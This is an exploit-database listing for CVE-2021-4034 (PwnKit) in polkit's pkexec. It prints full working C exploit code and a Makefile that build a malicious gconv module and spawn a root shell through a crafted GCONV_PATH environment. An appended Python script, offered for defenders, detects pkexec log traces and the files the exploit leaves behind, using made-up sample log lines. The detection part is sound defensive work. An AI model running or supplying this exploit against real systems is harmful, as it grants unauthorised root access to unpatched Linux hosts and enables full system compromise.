PolicyKit-1 0.105-31 Privilege Escalation

2022.01.27
Risk: High
Local: Yes
Remote: No
CWE: CWE-264


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: PolicyKit-1 0.105-31 - Privilege Escalation
# Exploit Author: Lance Biggerstaff
# Original Author: ryaagard (https://github.com/ryaagard)
# Date: 27-01-2022
# Github Repo: https://github.com/ryaagard/CVE-2021-4034
# References: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt

# Description: The exploit consists of three files `Makefile`, `evil-so.c` & `exploit.c`

##### Makefile #####

all:
	gcc -shared -o evil.so -fPIC evil-so.c
	gcc exploit.c -o exploit

clean:
	rm -r ./GCONV_PATH=. && rm -r ./evildir && rm exploit && rm evil.so

#################

##### evil-so.c #####

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void gconv() {}

void gconv_init() {
    setuid(0);
    setgid(0);
    setgroups(0);

    execve("/bin/sh", NULL, NULL);
}

#################

##### exploit.c #####

#include <stdio.h>
#include <stdlib.h>

#define BIN "/usr/bin/pkexec"
#define DIR "evildir"
#define EVILSO "evil"

int main()
{
    char *envp[] = {
        DIR,
        "PATH=GCONV_PATH=.",
        "SHELL=ryaagard",
        "CHARSET=ryaagard",
        NULL
    };
    char *argv[] = { NULL };

    system("mkdir GCONV_PATH=.");
    system("touch GCONV_PATH=./" DIR " && chmod 777 GCONV_PATH=./" DIR);
    system("mkdir " DIR);
    system("echo 'module\tINTERNAL\t\t\tryaagard//\t\t\t" EVILSO "\t\t\t2' > " DIR "/gconv-modules");
    system("cp " EVILSO ".so " DIR);

    execve(BIN, argv, envp);

    return 0;
}

#################
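For defenders, an added triage example (not part of the original exploit listing or of the polkit project): it flags the pkexec log messages that the Qualys advisory referenced above describes as traces of this technique, and the on-disk artifacts the listing creates (a `GCONV_PATH=` path name and a `gconv-modules` file outside the system library directories). The function names, the trusted-directory list and the sample log lines are assumptions constructed for illustration.

```python
import os
import re

# Start of the messages pkexec logs when it rejects an environment variable;
# the Qualys advisory referenced above names both as traces of this technique.
PKEXEC_TRACES = (
    "The value for the SHELL variable was not found the /etc/shells file",
    "The value for environment variable",
)
# Assumption: system locations where a gconv-modules file is expected.
TRUSTED_GCONV_DIRS = ("/usr/lib", "/usr/lib32", "/usr/lib64")

# Constructed sample lines, not captured from a real host.
SAMPLE_LOG = [
    "Jan 27 10:02:11 host pkexec[4242]: alice: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=/dev/pts/0] [CWD=/tmp/x] [COMMAND=<constructed>]",
    "Jan 27 10:05:40 host pkexec[4250]: pam_unix(polkit-1:session): session opened for user root by (uid=1000)",
    "Jan 27 10:06:02 host sshd[991]: Accepted publickey for alice from 192.0.2.10 port 50022 ssh2",
]


def scan_auth_log(lines):
    """Return the lines in which pkexec logged one of the known traces."""
    return [ln.rstrip("\n") for ln in lines
            if re.search(r"\bpkexec(\[\d+\])?:", ln) and any(t in ln for t in PKEXEC_TRACES)]


def scan_tree(root, trusted=TRUSTED_GCONV_DIRS):
    """Walk root and report (kind, path) for artifacts of the listing above."""
    prefixes = tuple(t.rstrip(os.sep) + os.sep for t in trusted)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            # A file or directory whose name looks like an environment assignment.
            if name.startswith("GCONV_PATH="):
                findings.append(("gconv_path_name", os.path.join(dirpath, name)))
        # A gconv module table outside the trusted system directories.
        real = os.path.realpath(dirpath) + os.sep
        if "gconv-modules" in filenames and not real.startswith(prefixes):
            findings.append(("stray_gconv_modules", os.path.join(dirpath, "gconv-modules")))
    return findings


if __name__ == "__main__":
    for hit in scan_auth_log(SAMPLE_LOG):
        print("LOG ", hit)
    for kind, path in scan_tree(os.getcwd()):
        print("FILE", kind, path)
```

Point `scan_auth_log` at the host's authentication log and `scan_tree` at world-writable locations such as `/tmp` and home directories; hits are leads to investigate, not proof of compromise.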



Copyright 2022, cxsecurity.com

 
